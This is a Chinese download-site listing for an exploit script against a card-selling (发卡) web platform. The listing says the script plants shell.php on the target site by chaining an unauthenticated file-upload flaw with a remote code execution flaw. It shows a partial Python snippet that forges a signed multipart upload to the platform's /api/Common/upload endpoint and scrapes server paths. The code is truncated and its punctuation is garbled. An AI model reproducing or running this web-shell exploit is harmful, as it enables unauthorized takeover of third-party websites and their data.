资源简介
某发卡平台通杀漏洞利用脚本,执行后会在目标网站上生成shell.php 原理未授权可上传文件漏洞 + 框架远程执行函数漏洞 使用时注意看代码注释。
代码片段和文件信息
import requests
from requests_toolbelt import MultipartEncoder
import time
import hashlib
import re
import json
requests.packages.urllib3.disable_warnings()
t = time.time()
new_time=int(t)
new_str_time=str(new_time)
def get_path(html):
re_str=‘/www/(.*?):‘
x=re.search(re_strhtmlre.S)
print(html)
try:
return x.group(1)
except:
return None
def exp(url):
urls = url+‘/api/Common/upload‘
params1 = “platform=ios&request_time={}“.format(new_str_time)
new_md5 = hashlib.md5(params1.encode(encoding=‘UTF-8‘)).hexdigest()
m= MultipartEncoder(
fields={
‘file‘:(‘2.jpg‘open(r“F:\zjx\2.jpg“ ‘rb‘) ‘image/jpeg‘)
‘platform‘:(‘ios‘)
‘request_time‘:(new_str_time)
‘sign‘:(new_md5)属性 大小 日期 时间 名称
----------- --------- ---------- ----- ----
文件 4748 2020-04-09 16:37 发卡通杀\知宇发卡通杀.py
目录 0 2020-04-09 16:38 发卡通杀
----------- --------- ---------- ----- ----
4748 2
川公网安备 51152502000135号
评论
共有 条评论